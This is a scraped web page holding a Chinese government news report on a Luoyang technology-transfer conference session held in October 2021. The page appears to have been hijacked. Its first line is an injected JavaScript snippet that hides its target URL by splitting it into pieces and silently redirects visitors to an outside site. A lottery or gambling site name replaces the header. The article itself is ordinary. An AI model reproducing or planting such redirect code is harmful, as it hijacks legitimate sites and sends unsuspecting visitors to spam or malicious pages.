var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 市县科技

第二届中国·河南开放创新暨跨国技术转移大会洛阳都市圈专场活动成功举行


发布日期:2021-10-21 09:10来源:洛阳市科学技术局 阅读次数:

  10月15日,第二届中国·河南开放创新暨跨国技术转移大会洛阳都市圈专场活动成功举行。

  本次专场活动以“汇聚科技创新资源助力洛阳都市圈建设”为主题,立足洛阳都市圈,链接国内外创新资源,邀请了一批院士、知名专家、高校院所以及洛阳都市圈相关部门和企业代表等300余人齐聚洛阳,通过搭建资源汇聚共享、需求对接交流、成果转移转化、项目合作共赢的高端平台,签约了一批技重大合作项目,为现代化建设提供了创新支撑。

  活动共举办了人才(团队)项目路演、企业技术需求发布会、科技成果发布会3个“洛阳专场”活动,共对外发布16项项目。邀请洛阳都市圈以及国内知名高校院所、创投机构、新型研发机构、高新技术企业等代表现场观摩。

  在人才(团队)路演专场上,清华大学邢新会教授团队、浙江大学叶志镇院士团队、同济大学孙毅教授团队、王栋梁研究员团队,分别围绕团队核心技术进行项目路演,与投融资机构现场对接。在科技成果发布会上,中色科技股份有限公司、河南科技大学、清洛基地等6家单位分别围绕各自最新技术成果开展重点推介,并现场与洛阳都市圈企业进行产业化合作洽谈,力争达成一批合作意向。在企业技术需求发布会上,围绕关键技术攻关,共对外发布CITYPLAN三维互动设计系统、锂电池软包用高端铝箔生产技术、开心散的物质基准与制剂研究、工业亚微米级精密尺寸视觉检测系统4项技术需求。

  本次专场活动搭建了人才团队与洛阳都市圈城市群、孵化载体、创投机构、企业之间交流对接的桥梁和平台,盘活人才、成果、技术、金融等资源,实现创新要素的跨区域高效流动。

  本次洛阳都市圈专场活动有以下特点:

  一是需求对接更加精准。在活动筹备期间,洛阳市科技局围绕企业核心技术突破、技术工艺升级等方面共性技术需求,通过洛阳中介超市、河南省科技成果转移转化公共服务平台等线上平台,以及组织专家学者下沉生产一线实地调研对接并收集技术需求,根据科技部人才交流开发服务中心专家摸排的企业技术创新需求清单和洛阳市“万人助万企”活动收集的企业技术创新需求清单,一方面由科技部人才交流开发服务中心为洛阳市相关企业精准匹配合作单位,另一方面通过线上平台发布企业技术创新需求信息,共收集到企业技术真实需求100余条,实现18家企业34项技术需求有效匹配,促成了企业技术难题的对接解决。

  二是创新项目更具规模。按照洛阳的发展定位,活动开幕式上集中开展了校地合作、项目揭榜攻关、成果转化、高层次人才招引等签约工作。其中集中发布“揭榜挂帅”攻关、成果转化项目以及新型研发机构建设共10项,项目总金额超过8亿元,其中有3个项目签约金额超亿元。其中成功签约5项“揭榜挂帅”项目,技术攻关类4项,成果转化类1项。项目聚焦洛阳市发展的重大科技创新需求以及制约洛阳市重点产业发展的共性关键核心技术、“卡脖子”技术、前沿技术,涵盖生物医药、新材料、装备制造等产业,通过引入外脑、联合产业化等方式,为洛阳市产业创新发展提供支撑。其中清洁合成高性能双氧水工作液项目、大马力智能动力换挡拖拉机国产化攻关与应用项目,入选河南省“揭榜挂帅”科技项目榜单。

  三是活动设计更富特色。本次专场还组织了“科技领军人才洛阳行”特色活动。活动聚焦洛阳市22家优势产业和骨干企业,由科技部人才交流开发服务中心精准匹配了来自浙江大学、同济大学、大连理工大学、西北工业大学等知名高校院所的18位国家科技创新高端人才,活动为期3天,共分为5个调研组,对洛阳市优势产业进行深度摸排和诊断,形成洛阳市优势产业骨干企业技术创新需求清单和优势产业发展专题咨询报告,为洛阳技术升级和产业结构优化调整提供智库力量,并对洛阳申建的“领军人才创新驱动中心”建设方案进行现场论证,开启了科技领军人才创新驱动中心(洛阳)项目建设进程。

  本次大会共设14场洛阳特色专场活动。除洛阳都市圈专场活动外,洛阳市还将参加重大关键技术需求“揭榜挂帅”专场活动、海外高层次人才暨项目对接洽谈专场活动、重点创新平台招才引智专场等省主会场活动,以及专场活动和线上活动。

  下一步,洛阳将做好专场活动“后半篇文章”,让大会成果更多更好地落地生根、开花结果。让开放创新的大门越开越大,锚定“建强副中心,形成增长极”,吸引更多的高端创新资源向洛阳集聚,以科技创新引领产业升级,走好从科技强到产业强、经济强的高质量发展新路,推动洛阳都市圈协同创新、联动发展。